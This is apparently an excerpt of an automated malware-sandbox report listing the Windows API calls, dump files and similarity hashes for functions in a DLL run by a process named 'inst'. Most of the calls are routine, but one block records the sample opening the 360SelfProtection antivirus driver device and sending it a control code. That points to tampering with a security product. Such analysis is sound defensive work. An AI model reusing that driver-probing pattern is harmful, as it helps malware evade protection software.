                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,AddDllDirectory), ref: 6C638CD8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 6C638CDB
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(6C5E3FDF,00000000,00000000), ref: 6C638CFE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Module$Handle$AddressFileLibraryLoadNameProc
                                                                                                                                                                                                                      • String ID: AddDllDirectory$Kernel32.dll
                                                                                                                                                                                                                      • API String ID: 2449539070-4108935418
                                                                                                                                                                                                                      • Opcode ID: 3dae4ab8a5217780039992692ec2e199bc3bf63b71ddb3b9e8f1fa8c4dceebeb
                                                                                                                                                                                                                      • Instruction ID: 6262c517ec424c4b4902ab773dffe16a931ccb6b283c2174d8c65521d3383b12
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3dae4ab8a5217780039992692ec2e199bc3bf63b71ddb3b9e8f1fa8c4dceebeb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1148703066296ADF019B32CD88FEA7BBCAB8B708F10653BE405E3480DB3494448B6C
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C630C0C
                                                                                                                                                                                                                      • IsRectEmpty.USER32(?), ref: 6C630C75
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001,?,00000020,?,00000000,00000000), ref: 6C630C97
                                                                                                                                                                                                                        • Part of subcall function 6C5EC3D5: GetDC.USER32(?), ref: 6C5EC3E3
                                                                                                                                                                                                                        • Part of subcall function 6C5EEC18: CreateCompatibleDC.GDI32(?), ref: 6C5EEC3C
                                                                                                                                                                                                                        • Part of subcall function 6C5EEC18: SelectObject.GDI32(?,?), ref: 6C5EEC63
                                                                                                                                                                                                                        • Part of subcall function 6C5EEC18: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 6C5EEC7C
                                                                                                                                                                                                                        • Part of subcall function 6C5EDBF6: CreateRectRgn.GDI32(?,?,?,?), ref: 6C5EDC09
                                                                                                                                                                                                                      • SelectClipRgn.GDI32(?,?), ref: 6C630CEA
                                                                                                                                                                                                                      • OffsetClipRgn.GDI32(?,?,?,?,00000020,?,00000000,00000000), ref: 6C630CF9
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000007E8,?,?), ref: 6C630D1B
                                                                                                                                                                                                                      • SelectClipRgn.GDI32(?,00000000), ref: 6C630D4A
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6C630D5E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipRectSelect$CreateObject$CompatibleDeleteEmptyH_prolog3InvalidateMessageOffsetSendViewport
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3329816297-0
                                                                                                                                                                                                                      • Opcode ID: e0e228a8e03b3f5f7e307bc97526830a8385b12c7c1ab4450967d9a3b879c466
                                                                                                                                                                                                                      • Instruction ID: 9d9c25de872c5f7db734eb03c769635e9df06eae9815a6b48ce905390aa9ad4f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0e228a8e03b3f5f7e307bc97526830a8385b12c7c1ab4450967d9a3b879c466
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F512771A00259EFDF01DFA5CC80EEEBBB9FF49314F106419E51AA7250DB30A949CB68
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C5FCC26
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000078,6C5FCEC8,?,?,?,00000001), ref: 6C5FCC66
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,00000000,?), ref: 6C5FCC87
                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 6C5FCCE0
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 6C5FCD25
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionVariant$ClearEnterH_prolog3InitLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1050041418-0
                                                                                                                                                                                                                      • Opcode ID: cf46d38040bbc011289b43e3260c6531582595ccf6b36986e64c1d54ba246a28
                                                                                                                                                                                                                      • Instruction ID: b81248daa21ece5496a5d3a644c76b52cb75f5cebeb204152df85a0def2d7c05
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf46d38040bbc011289b43e3260c6531582595ccf6b36986e64c1d54ba246a28
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E41497190120AEFDF05DFA4CD84AEEBBB8FF45308F204429E515A6690EB71AE45CF64
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(18AE8C58), ref: 6C5D6CFA
                                                                                                                                                                                                                      • HeapLock.KERNEL32(00000000), ref: 6C5D6D20
                                                                                                                                                                                                                      • HeapWalk.KERNEL32(00000000,?), ref: 6C5D6D3A
                                                                                                                                                                                                                      • HeapWalk.KERNEL32(00000000,?), ref: 6C5D6D6E
                                                                                                                                                                                                                      • HeapUnlock.KERNEL32(00000000), ref: 6C5D6D82
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$Walk$LockProcessUnlock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2227978497-0
                                                                                                                                                                                                                      • Opcode ID: 5fd4feeb844740649d99b0663f7c2cf0bddf443503f0b59c96e858b5ba7a0fc0
                                                                                                                                                                                                                      • Instruction ID: 28fe9a92e2c12f1688025786748e2e98a732c261ea59c39e9d1e4b0e63cff332
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fd4feeb844740649d99b0663f7c2cf0bddf443503f0b59c96e858b5ba7a0fc0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE2125322097419FC700DF2AD840A9AB7F4EF85664F510A2EF851C3640DB30A502CBAA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C678D05
                                                                                                                                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 6C678D2D
                                                                                                                                                                                                                        • Part of subcall function 6C5DCA0D: __EH_prolog3.LIBCMT ref: 6C5DCA14
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 6C678D42
                                                                                                                                                                                                                        • Part of subcall function 6C68D5D6: RaiseException.KERNEL32(?,?,6C68DF98,?,?,?,?,?,6C68DF98,?,6C6C908C,6C7035A4), ref: 6C68D618
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3$ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
                                                                                                                                                                                                                      • String ID: map/set<T> too long
                                                                                                                                                                                                                      • API String ID: 1048600877-1285458680
                                                                                                                                                                                                                      • Opcode ID: 6782d05fd0d7a0c277dbdadf5574ddb51b7b385d8be21fa9502f08c25d5a8ab7
                                                                                                                                                                                                                      • Instruction ID: 5a0daafd41c8d06781f9024494eec5fe0b272f47f3d5d6801b920c160ae92967
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6782d05fd0d7a0c277dbdadf5574ddb51b7b385d8be21fa9502f08c25d5a8ab7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E515771600640DFD725DF09C584A99BBF1BF19318F09898AD444ABBA2C770FC86CFA8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C676C83
                                                                                                                                                                                                                      • CharLowerW.USER32(00000001,00000001,0000001C,6C675DDA,6C6B63E0,00000001,00000000,?,00000000,00000000,00000000,00000001), ref: 6C676CC0
                                                                                                                                                                                                                        • Part of subcall function 6C5D894F: InterlockedDecrement.KERNEL32(-000000F4), ref: 6C5D8963
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharDecrementH_prolog3InterlockedLower
                                                                                                                                                                                                                      • String ID: DPI_%d_%s$DPI_%d_%s\%s
                                                                                                                                                                                                                      • API String ID: 3802631866-1944168103
                                                                                                                                                                                                                      • Opcode ID: 02f997a5a1bfca8bdb3dada5d6e7105a1e5f29b86e01cc755047ccc27b9879ee
                                                                                                                                                                                                                      • Instruction ID: 5131f70f2a64900be61ceba1c2a802001fd9f40c43d808a6a77844d35cbd22df
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02f997a5a1bfca8bdb3dada5d6e7105a1e5f29b86e01cc755047ccc27b9879ee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F941717591120ADFCF10DFA4CD91AEEB7B0BF19318F104915D515A7BA0EB30AA18CBA9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(\\.\360SelfProtection,00000080,00000003,00000000,00000003,00000000,00000000,6C5E3FDF,771B0E50,?,?,?,6C638C75,00000000), ref: 6C638C1D
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0022204C,6C638C75,00000004,00000000,00000004,6C638C75,00000000), ref: 6C638C4C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,6C638C75,00000000), ref: 6C638C55
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                      • String ID: \\.\360SelfProtection
                                                                                                                                                                                                                      • API String ID: 33631002-936859468
                                                                                                                                                                                                                      • Opcode ID: 081bb413ed4db25762ba6f802f5758c5617ee0b2dc56c86ddcc9b8c228c2f0c8
                                                                                                                                                                                                                      • Instruction ID: 3aba469194d6066c7e2c7de56639718d3addfcd7e0b22aab598f3b811f73584c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 081bb413ed4db25762ba6f802f5758c5617ee0b2dc56c86ddcc9b8c228c2f0c8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AF0A471602228BFDB109AA6DC89EEF7A7CDB86B60F105112F604E60D0D2B49F00C7A8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 6C606D16
                                                                                                                                                                                                                      • ColorHLSToRGB.SHLWAPI(?,?,?), ref: 6C606DC9
                                                                                                                                                                                                                      • ColorHLSToRGB.SHLWAPI(?,?,?), ref: 6C606DD9
                                                                                                                                                                                                                      • ColorHLSToRGB.SHLWAPI(?,?,?), ref: 6C606DEA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2811717613-0
                                                                                                                                                                                                                      • Opcode ID: 2f289b8c9114ad83617d5d2cb15604833d42571d09ac3a5f24c3da21eaa11cb5
                                                                                                                                                                                                                      • Instruction ID: 0326b1db2e3eeda621d116718799af274071fe10f24376e1710b0d2ae15fba4d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f289b8c9114ad83617d5d2cb15604833d42571d09ac3a5f24c3da21eaa11cb5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3831B071E0022EAACF065FA5CA452EE7FB4EF06381F104645F941B12A0E77586A1DBE8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C679AD9: GdipAlloc.GDIPLUS(00000008), ref: 6C679AED
                                                                                                                                                                                                                        • Part of subcall function 6C679AD9: SetBkMode.GDI32(00000000,00000001), ref: 6C679B0D
                                                                                                                                                                                                                        • Part of subcall function 6C679AD9: CreateFontIndirectW.GDI32(?), ref: 6C679B19
                                                                                                                                                                                                                      • GdipDeletePath.GDIPLUS(?), ref: 6C67CC43
                                                                                                                                                                                                                      • GdipFree.GDIPLUS(?,?), ref: 6C67CC49
                                                                                                                                                                                                                      • GdipDeletePath.GDIPLUS(?), ref: 6C67CCCA
                                                                                                                                                                                                                      • GdipFree.GDIPLUS(?,?), ref: 6C67CCD0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Gdip$DeleteFreePath$AllocCreateFontIndirectMode
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1213607936-0
                                                                                                                                                                                                                      • Opcode ID: 0dfefc93b5a52fdbb287b24ffaf05ba621c1c0e2b400ea71ba9ec228c29ce58e
                                                                                                                                                                                                                      • Instruction ID: 033f7f87bfa053554b2af09dda8b7670c51b23383466b199072c15bd2b341149
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dfefc93b5a52fdbb287b24ffaf05ba621c1c0e2b400ea71ba9ec228c29ce58e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6218B71501109FFDF109F64DD449EA3BB8EF4A358B214884FD5567210D332DA25DBB8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C6799A5: GdipAlloc.GDIPLUS(00000008), ref: 6C6799B9
                                                                                                                                                                                                                        • Part of subcall function 6C6799A5: SetBkMode.GDI32(00000000,00000001), ref: 6C6799D9
                                                                                                                                                                                                                        • Part of subcall function 6C6799A5: CreateFontIndirectW.GDI32(?), ref: 6C6799E5
                                                                                                                                                                                                                      • GdipDeletePath.GDIPLUS(00000000), ref: 6C67EC73
                                                                                                                                                                                                                      • GdipFree.GDIPLUS(00000000,00000000), ref: 6C67EC79
                                                                                                                                                                                                                      • GdipDeletePath.GDIPLUS(00000000), ref: 6C67ECB5
                                                                                                                                                                                                                      • GdipFree.GDIPLUS(00000000,00000000), ref: 6C67ECBB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Gdip$DeleteFreePath$AllocCreateFontIndirectMode
                                                                                                                                                                                                                      • String ID:
